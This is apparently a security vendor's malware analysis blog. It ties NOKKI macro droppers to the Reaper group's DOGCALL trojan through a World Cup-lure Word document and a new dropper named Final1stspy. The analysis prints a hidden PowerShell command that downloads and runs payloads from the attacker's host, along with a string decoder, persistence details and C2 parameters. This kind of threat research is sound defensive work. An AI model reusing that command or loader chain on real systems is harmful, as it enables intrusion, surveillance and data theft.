Recently, Unit 42 identified the NOKKI malware family that was used in attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. As part of this research, an interesting tie was discovered to the threat actor group known as Reaper.
The Reaper group has been publicly attributed to North Korea by other security organizations, targeting organizations that align with the interests of this country. Such targeted organizations include the military and defense industry within South Korea, as well as a Middle Eastern organization that was doing business with North Korea. Part of this group’s modus operandi includes the use of a custom malware family called DOGCALL. DOGCALL is a remote access Trojan (RAT) that uses third-party hosting services to upload data and accept commands. At the time of publication, we observe this particular malware family in use by the Reaper threat actor group only.
This blog details the relationship found between the NOKKI and DOGCALL malware families, as well provides additional information about a previously unreported malware family used to deploy DOGCALL, which we have named Final1stspy based on a pdb string in the malware.
Tying the Knot
While researching the NOKKI malware threat, Unit 42 discovered the most recent cluster of attacks beginning in July 2018 leveraged malicious macros within a Microsoft Word document. These particular macros were not overly complex in nature, and simply would attempt to perform the following actions:
- Download and run an executable malware payload.
- Download and open a Microsoft Word decoy document.
To avoid detection, the macros employ simple obfuscation of interesting strings that ultimately just used base64 encoding. However, it used a somewhat unusual method where it would first convert the base64-encoded text into hex, and then convert that hex into a text string.
Figure 1 Malicious macro downloading remote payload and executing it (comments added by Unit 42 for clarity)
Figure 2 Malicious macro implementing unique deobfuscation scheme (comments added by malware author
By searching on this unique deobfuscation technique present in all samples delivering NOKKI, a single other file was identified. This file had the following properties:
|Created Date||2018-03-19 07:58:00 UTC|
|Last Modified Date||2018-06-16 14:19:00 UTC|
|Original Filename||World Cup predictions.doc|
Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.
Figure 3 Similarities between NOKKI dropper and World Cup predictions dropper
While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.
The lure in question includes the below text from a publicly available article written on ESPN in the UK:
“Peru and Denmark face off in the third match, and this time it doesn’t seem as one sided. Four people go for a Peru victory, three for Denmark and three for the draw.
Last but not least, we get to see Croatia and Nigeria for the first time. Our Nigeria expert, Colin, reckons there will be plenty of goals and a 3-2 win for his side — the only person to back the Super Eagles.
Check out how our pundits got on with their predictions for following games and remember to join the pundits’ league in Match Predictor.
We’ve got our top talent on hand from England, the United States, Mexico, Brazil, Argentina, Colombia, Australia, and Africa — many of whom will be based out in Russia for the tournament — to analyze each and every one of the 64 matches.
We’ll score our experts just as we do in the Match Predictor — 10 points for correct result, with a bonus 20 points for getting the score line right too.”
Interestingly enough, two commented out lures were also included in this document. One simply contains the phrase of “I miss u.”, but the second lure contains text from a publicly available article online discussing a visit by the North Korean leader to Singapore, shown below.
“This aircraft seems to have conveyed a North Korean advance team including diplomats and security personnel.
The 747-400, which just landed in Singapore, was apparently used to fly Kim and his personal aides to the summit.
This would also be consistent with our previous reporting that North Korea had settled on such a plan.
The Jumbo Jet in question is quite special. B-2447 is used by the top rungs of the Chinese government, predominantly President Xi Jinping and his entourage, when traveling abroad.
It is capable of being specially outfitted with a VIP interior and has special interfaces for secure satellite communications among other modifications.
With this in mind, it wasn’t surprising seeing it being used as ‘Kim Force One’ for this special mission.”
When the chain of execution completes on the World Cup predictions.doc file, a DOGCALL malware sample is executed on the victim machine.
The commented lure and payload used by the malware provides an interesting detail given that DOGCALL has been attributed to the threat actor group known as Reaper, which has been attributed to North Korea by other security organizations.
Continuing Execution of the Malware
After the initial execution of World Cup predictions.doc is run, it proceeds to download a VBScript file from the following URL:
- http:// kmbr1.nitesbr1[.]org/UserFiles/File/image/home.html
This VBScript file yet again contains the exact same unique deobfuscation routine that was previously discussed. When this second stage VBScript file executes, it begins by writing the following data to %APPDATA%\Microsoft\mib.dat. This file will later be used by the Final1stspy malware family, which we discuss later in this post.
After this file is written, it will execute the following (deobfuscated):
objShell.Run "cmd.exe /k powershell.exe" & " " & "-windowstyle" & " " & "hidden" & " " & "-ExecutionPolicy Bypass" & " " & "$h='%APPDATA%/Microsoft/Windows/msvcrt32.dll'" & ";" & "$f='%APPDATA%/Microsoft/ieConv.exe'" & ";" & "$x='" & "http://" & "kmbr1.nitesbr1.org" & "/UserFiles/File/image/images/happy.jpg" & "';" & "$t='" & "http://" & "kmbr1.nitesbr1[.]org" & "/UserFiles/File/image/images/wwwtest.jpg" & "';" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($t,$f)" & ";" & "(" & "New-Object System.Net.WebClient" & ")" & ".DownloadFile($x,$h)" & ";" & "Start-Process $f" & ";" & "Stop-Process" & " " & "-processname" & " " & "cmd", 0
This executed code simply downloads two files from http:// kmbr1.nitesbr1[.]org/UserFiles/File/images/happy.jpg and http:// kmbr1.nitesbr1[.]org/UserFiles/File/images/wwwtest.jpg and stores them in %APPDATA%/Microsoft/Windows/msvcrt32.dll and %APPDATA%/Microsoft/ieConv.exe, respectively. Finally, the VBScript file will execute the previously downloaded ieConv.exe file in a new process.
These two files are instances of a previously unreported dropper malware family that we are calling Final1stspy.
Overview of Final1stspy
As previously stated, the Final1stspy malware family is split between an executable file and a DLL. These files have the following properties (Note: the DLL information is provided after it is decrypted by the malware):
|File Type||PE32 executable (GUI) Intel 80386, for MS Windows|
|Compile Timestamp||2018-06-01 15:52:41 UTC|
|PDB String||E:\Final Project(20180108)\Final1stspy\LoadDll\Release\LoadDll.pdb|
|File Type||PE32 executable (DLL) (GUI) Intel 80386, for MS Windows|
|Compile Timestamp||2018-06-17 17:04:15 UTC|
|PDB String||E:\Final Project(20180108)\Final1stspy\hadowexecute – Copy\Release\hadowexecute.pdb|
As we can see, both samples were compiled within a couple weeks of each other. Additionally, the original Microsoft Word document used to deliver this malware was last modified roughly a day before the DLL was compiled.
Both the executable and DLL make use of a specific routine to obfuscate strings of importance. The following code, written in Python, decodes these strings:
data = "[Obfuscated String]"
dataDecoded = b64decode(data)
outVar = ""
for char in dataDecoded:
outVar += chr(((ord(char) + 122) ^ 0x19) & 0xff)
The Final1stspy malware begins by looking for the presence of the following file:
Should this file be present, the malware will load the DLLs and attempt to call the exported main_func function.
Otherwise, the malware will look for the following file:
In the event this file is present, the malware will decrypt this file by XORing it against 0x50, write it to the previously mentioned msvcrt64.dll path, and load the main_func function.
This DLL uses the same string obfuscation routine witnessed in the executable. It begins by collecting basic system information and ensuring persistence by setting the following registry key to point to %APPDATA%/Microsoft/ieConv.exe:
The Final1stspy malware family continues to read and parse the previously written mib.dat file. The data is parsed to eventually be used in subsequent HTTP GET requests, representing the Index, Account, and Group variables.
Final1stspy has the ability to read in a %APPDATA%/Microsoft/olevnc.ini file that has several variables stored within it, such as the user-agent, URL, port, and interval counts. In the event this file is not present, such as in our given situation, the malware will default to a hardcoded user-agent and URL. This particular sample communicates with http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php with a user-agent of Host Process Update.
The malware proceeds to make a HTTP GET request to the URL, such as the following example:
Figure 4 HTTP request made by Final1stspy malware family
The following GET parameters are present in this request:
|MachineId||MD5 generated from data obtained from machine victim|
|InfoSo||Microsoft Windows version information and CPU architecture|
|Index||Data obtained from mib.dat|
|Account||Data obtained from mib.dat|
|Group||Data obtained from mib.dat|
|List||List of running processes (base64-encoded)|
The malware expects to receive a payload that will subsequently be decrypted using a single-byte XOR key of 0x49. This payload will be loaded on the victim machine. After decryption, the following payload was identified:
|File Type||PE32 executable (GUI) Intel 80386, for MS Windows|
|Compile Timestamp||2018-05-26 10:46:59 UTC|
As we can see by the compile timestamp above, this file appears to have been compiled close to the Final1stspy executable. This payload has been identified as belonging to the DOGCALL malware family. It is able to perform the following actions on the victim:
- Take screenshots
- Capture microphone data
- Collect victim information
- Collect files of interest
- Download and execute additional payloads
The malware communicates with third-party hosting services for C2 channels, including the following services:
- Yandex Cloud
What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group. There are some curious aspects to this relationship, such as commented out North Korean-related lure information and DOGCALL malware payload. Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy.
Unit 42 will continue to monitor this threat and report on any updates encountered in the future. Palo Alto Networks customers are protected against this threat in the following ways:
- All malware encountered is appropriately classified as malicious by WildFire
- TRAPs blocks this threat
- AutoFocus customers may track this threat via the KONNI, NOKKI, Final1stspy, DOGCALL, and Reaper
Indicators of Compromise
World Cup predictions Sample